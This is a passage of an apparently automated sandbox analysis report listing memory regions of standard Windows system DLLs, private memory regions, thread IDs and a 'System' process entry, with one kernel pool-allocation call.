mapped_file name = "nlasvc.dll" filename = "\\Windows\\System32\\nlasvc.dll" (normalized: "c:\\windows\\system32\\nlasvc.dll") Region: id = 736 start_va = 0x7fef7e80000 end_va = 0x7fef7e96fff entry_point = 0x7fef7e80000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 737 start_va = 0x7fef7ea0000 end_va = 0x7fef804ffff entry_point = 0x7fef7ea0000 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 738 start_va = 0x7fef80c0000 end_va = 0x7fef80effff entry_point = 0x7fef80c0000 region_type = mapped_file name = "cryptsvc.dll" filename = "\\Windows\\System32\\cryptsvc.dll" (normalized: "c:\\windows\\system32\\cryptsvc.dll") Region: id = 739 start_va = 0x7fef81c0000 end_va = 0x7fef81dffff entry_point = 0x7fef81c0000 region_type = mapped_file name = "wkssvc.dll" filename = "\\Windows\\System32\\wkssvc.dll" (normalized: "c:\\windows\\system32\\wkssvc.dll") Region: id = 740 start_va = 0x7fefaef0000 end_va = 0x7fefaf07fff entry_point = 0x7fefaef0000 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 741 start_va = 0x7fefaf10000 end_va = 0x7fefaf20fff entry_point = 0x7fefaf10000 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 742 start_va = 0x7fefafd0000 end_va = 0x7fefafd6fff entry_point = 0x7fefafd0000 region_type = mapped_file name = "dnsext.dll" filename = "\\Windows\\System32\\dnsext.dll" (normalized: "c:\\windows\\system32\\dnsext.dll") Region: id = 743 start_va = 0x7fefafe0000 end_va = 0x7fefb032fff entry_point = 0x7fefafe0000 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 744 start_va = 0x7fefb040000 end_va = 0x7fefb06ffff entry_point = 0x7fefb040000 region_type = mapped_file name = "dnsrslvr.dll" filename = "\\Windows\\System32\\dnsrslvr.dll" (normalized: "c:\\windows\\system32\\dnsrslvr.dll") Region: id = 745 start_va = 0x7fefb130000 end_va = 0x7fefb13afff entry_point = 0x7fefb130000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 746 start_va = 0x7fefb140000 end_va = 0x7fefb166fff entry_point = 0x7fefb140000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 747 start_va = 0x7fefb1c0000 end_va = 0x7fefb226fff entry_point = 0x7fefb1c0000 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 748 start_va = 0x7fefb260000 end_va = 0x7fefb278fff entry_point = 0x7fefb260000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 749 start_va = 0x7fefb890000 end_va = 0x7fefb8a3fff entry_point = 0x7fefb890000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 750 start_va = 0x7fefb8b0000 end_va = 0x7fefb8c4fff entry_point = 0x7fefb8b0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 751 start_va = 0x7fefb8d0000 end_va = 0x7fefb8dbfff entry_point = 0x7fefb8d0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 752 start_va = 0x7fefba10000 end_va = 0x7fefba20fff entry_point = 0x7fefba10000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 753 start_va = 0x7fefbff0000 end_va = 0x7fefc00cfff entry_point = 0x7fefbff0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 754 start_va = 0x7fefc540000 end_va = 0x7fefc66bfff entry_point = 0x7fefc540000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 755 start_va = 0x7fefca40000 end_va = 0x7fefca46fff entry_point = 0x7fefca40000 region_type = mapped_file name = "wshtcpip.dll" filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll") Region: id = 756 start_va = 0x7fefcb30000 end_va = 0x7fefcb4afff entry_point = 0x7fefcb30000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 757 start_va = 0x7fefcb50000 end_va = 0x7fefcb6dfff entry_point = 0x7fefcb50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 758 start_va = 0x7fefcca0000 end_va = 0x7fefcca9fff entry_point = 0x7fefcca0000 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 759 start_va = 0x7fefcce0000 end_va = 0x7fefcd2bfff entry_point = 0x7fefcce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 760 start_va = 0x7fefcda0000 end_va = 0x7fefcde6fff entry_point = 0x7fefcda0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 761 start_va = 0x7fefcec0000 end_va = 0x7fefcf1afff entry_point = 0x7fefcec0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 762 start_va = 0x7fefd030000 end_va = 0x7fefd036fff entry_point = 0x7fefd030000 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll") Region: id = 763 start_va = 0x7fefd040000 end_va = 0x7fefd094fff entry_point = 0x7fefd040000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 764 start_va = 0x7fefd0a0000 end_va = 0x7fefd0b6fff entry_point = 0x7fefd0a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 765 start_va = 0x7fefd1b0000 end_va = 0x7fefd1e1fff entry_point = 0x7fefd1b0000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 766 start_va = 0x7fefd210000 end_va = 0x7fefd231fff entry_point = 0x7fefd210000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 767 start_va = 0x7fefd2d0000 end_va = 0x7fefd33cfff entry_point = 0x7fefd2d0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 768 start_va = 0x7fefd640000 end_va = 0x7fefd64afff entry_point = 0x7fefd640000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 769 start_va = 0x7fefd670000 end_va = 0x7fefd694fff entry_point = 0x7fefd670000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 770 start_va = 0x7fefd6a0000 end_va = 0x7fefd6aefff entry_point = 0x7fefd6a0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 771 start_va = 0x7fefd750000 end_va = 0x7fefd78cfff entry_point = 0x7fefd750000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 772 start_va = 0x7fefd790000 end_va = 0x7fefd7a3fff entry_point = 0x7fefd790000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 773 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff entry_point = 0x7fefd7b0000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 774 start_va = 0x7fefd850000 end_va = 0x7fefd85efff entry_point = 0x7fefd850000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 775 start_va = 0x7fefd900000 end_va = 0x7fefd96afff entry_point = 0x7fefd900000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 776 start_va = 0x7fefd990000 end_va = 0x7fefdaf6fff entry_point = 0x7fefd990000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 777 start_va = 0x7fefdb00000 end_va = 0x7fefdb35fff entry_point = 0x7fefdb00000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 778 start_va = 0x7fefdb80000 end_va = 0x7fefdc48fff entry_point = 0x7fefdb80000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 779 start_va = 0x7fefdc50000 end_va = 0x7fefdd26fff entry_point = 0x7fefdc50000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 780 start_va = 0x7fefdd30000 end_va = 0x7fefdd3dfff entry_point = 0x7fefdd30000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 781 start_va = 0x7fefdd40000 end_va = 0x7fefdd6dfff entry_point = 0x7fefdd40000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 782 start_va = 0x7fefdef0000 end_va = 0x7fefdef7fff entry_point = 0x7fefdef0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 783 start_va = 0x7fefed10000 end_va = 0x7fefed76fff entry_point = 0x7fefed10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 784 start_va = 0x7fefed80000 end_va = 0x7fefee88fff entry_point = 0x7fefed80000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 785 start_va = 0x7feff0f0000 end_va = 0x7feff1cafff entry_point = 0x7feff0f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 786 start_va = 0x7feff1d0000 end_va = 0x7feff2fcfff entry_point = 0x7feff1d0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 787 start_va = 0x7feff4e0000 end_va = 0x7feff550fff entry_point = 0x7feff4e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 788 start_va = 0x7feff560000 end_va = 0x7feff5f8fff entry_point = 0x7feff560000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 789 start_va = 0x7feff850000 end_va = 0x7feff86efff entry_point = 0x7feff850000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 790 start_va = 0x7feff870000 end_va = 0x7feffa72fff entry_point = 0x7feff870000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 791 start_va = 0x7feffa80000 end_va = 0x7feffb1efff entry_point = 0x7feffa80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 792 start_va = 0x7feffb20000 end_va = 0x7feffb6cfff entry_point = 0x7feffb20000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 793 start_va = 0x7feffb80000 end_va = 0x7feffb80fff entry_point = 0x7feffb80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 794 start_va = 0x7fffff94000 end_va = 0x7fffff95fff entry_point = 0x0 region_type = private name = "private_0x000007fffff94000" filename = "" Region: id = 795 start_va = 0x7fffff96000 end_va = 0x7fffff97fff entry_point = 0x0 region_type = private name = "private_0x000007fffff96000" filename = "" Region: id = 796 start_va = 0x7fffff98000 end_va = 0x7fffff99fff entry_point = 0x0 region_type = private name = "private_0x000007fffff98000" filename = "" Region: id = 797 start_va = 0x7fffff9a000 end_va = 0x7fffff9bfff entry_point = 0x0 region_type = private name = "private_0x000007fffff9a000" filename = "" Region: id = 798 start_va = 0x7fffff9e000 end_va = 0x7fffff9ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff9e000" filename = "" Region: id = 799 start_va = 0x7fffffa2000 end_va = 0x7fffffa3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa2000" filename = "" Region: id = 800 start_va = 0x7fffffa6000 end_va = 0x7fffffa7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffa6000" filename = "" Region: id = 801 start_va = 0x7fffffaa000 end_va = 0x7fffffabfff entry_point = 0x0 region_type = private name = "private_0x000007fffffaa000" filename = "" Region: id = 802 start_va = 0x7fffffac000 end_va = 0x7fffffadfff entry_point = 0x0 region_type = private name = "private_0x000007fffffac000" filename = "" Region: id = 803 start_va = 0x7fffffae000 end_va = 0x7fffffaffff entry_point = 0x0 region_type = private name = "private_0x000007fffffae000" filename = "" Region: id = 804 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 805 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 806 start_va = 0x7fffffd5000 end_va = 0x7fffffd5fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 807 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 808 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 809 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 810 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 811 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Thread: id = 43 os_tid = 0x8f8 Thread: id = 44 os_tid = 0x8b0 Thread: id = 45 os_tid = 0x210 Thread: id = 46 os_tid = 0x7a4 Thread: id = 47 os_tid = 0x7a0 Thread: id = 48 os_tid = 0x798 Thread: id = 49 os_tid = 0x794 Thread: id = 50 os_tid = 0x674 Thread: id = 51 os_tid = 0x654 Thread: id = 52 os_tid = 0x5e8 Thread: id = 53 os_tid = 0x41c Thread: id = 54 os_tid = 0x418 Thread: id = 55 os_tid = 0x414 Thread: id = 56 os_tid = 0x3d8 Thread: id = 57 os_tid = 0x2b0 Thread: id = 58 os_tid = 0x290 Thread: id = 60 os_tid = 0x7ec Thread: id = 63 os_tid = 0x8f0 Thread: id = 65 os_tid = 0x900 Thread: id = 67 os_tid = 0x9a4 Thread: id = 68 os_tid = 0x9e8 Process: id = "7" image_name = "System" filename = "" page_root = "0x187000" os_pid = "0x4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "kernel_analysis" parent_id = "0" os_parent_pid = "0x0" cmd_line = "" cur_dir = "" os_username = "NT AUTHORITY\\SYSTEM" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Region: id = 888 start_va = 0x10000 end_va = 0x32fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 889 start_va = 0x76e40000 end_va = 0x76fe8fff entry_point = 0x76e40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 890 start_va = 0x77020000 end_va = 0x7719ffff entry_point = 0x77020000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 891 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Thread: id = 69 os_tid = 0x8 Thread: id = 70 os_tid = 0x24 Thread: id = 71 os_tid = 0x30 Thread: id = 72 os_tid = 0x34 Thread: id = 73 os_tid = 0x40 [0231.310] ExAllocatePoolWithTag (PoolType=0x0, NumberOfBytes=0x1cff2, Tag=0x70764946) returned 0xfffffa80019e5000 Thread: id = 74 os_tid = 0xb0 Thread: id = 75 os_tid = 0xc4 Thread: id = 76 os_tid = 0x9c Thread: id = 77 os_tid = 0x78 Thread: id = 78 os_tid = 0xc0 Thread: id = 79 os_tid = 0x28 Thread: id = 80 os_tid = 0x3c Thread: id = 81 os_tid = 0x38 Thread: id = 82 os_tid = 0xcc Thread: id = 83 os_tid = 0x48 Thread: id = 84 os_tid = 0xd0 Thread: id = 85 os_tid = 0xb8 Thread: id = 86 os_tid = 0xd4 Thread: id = 87 os_tid = 0xd8 Thread: id = 88 os_tid = 0xdc Thread: id = 89 os_tid = 0xe8 Thread: id = 90 os_tid = 0xec Thread: id = 91 os_tid = 0x64 Thread: id = 92 os_tid = 0x2c Thread: id = 93 os_tid = 0xfc Thread: id = 94 os_tid = 0x104 Thread: id = 95 os_tid = 0x114 Thread: id = 96 os_tid = 0x4c Thread: id = 97 os_tid = 0x108 Thread: id = 98 os_tid = 0x80 Thread: id = 99 os_tid = 0x88 Thread: id = 100 os_tid = 0x98 Thread: id = 101 os_tid = 0x8c Thread: id = 102 os_tid = 0x5c Thread: id = 103 os_tid = 0x10c Thread: id = 104 os_tid = 0x12c Thread: id = 105 os_tid = 0x130 Thread: id = 106 os_tid = 0x134 Thread: id = 107 os_tid = 0x138 Thread: id = 108 os_tid = 0x174 Thread: id = 109 os_tid = 0x90 Thread: id = 110 os_tid = 0x100 Thread: id = 111 os_tid = 0x74 Thread: id = 112 os_tid = 0x268 Thread: id = 113 os_tid = 0x2e4 Thread: id = 114 os_tid = 0x84 Thread: id = 115 os_tid = 0x68 Thread: id = 116 os_tid = 0x20 Thread: id = 117 os_tid = 0x3ac Thread: id = 118 os_tid = 0x42c Thread: id = 119 os_tid = 0x47c Thread: id = 120 os_tid = 0x94 Thread: id = 121 os_tid = 0x560 Thread: id = 122 os_tid = 0x598 Thread: id = 123 os_tid = 0x59c Thread: id = 124 os_tid = 0x5ec Thread: id = 125 os_tid = 0x5fc Thread: id = 126 os_tid = 0x680 Thread: id = 127 os_tid = 0x68c Thread: id = 128 os_tid = 0x69c Thread: id = 129 os_tid = 0x6a8 Thread: id = 130 os_tid = 0x6ac Thread: id = 131 os_tid = 0x6b4 Thread: id = 132 os_tid = 0x434 Thread: id = 133 os_tid = 0x1c Thread: id = 134 os_tid = 0x744 Thread: id = 135 os_tid = 0x430 Thread: id = 136 os_tid = 0x758 Thread: id = 137 os_tid = 0x0 Thread: id = 138 os_tid = 0x798 Thread: id = 139 os_tid = 0x7e0 Thread: id = 140 os_tid = 0x60 Thread: id = 141 os_tid = 0x50 Thread: id = 142 os_tid = 0xa0 Thread: id = 143 os_tid = 0x7f0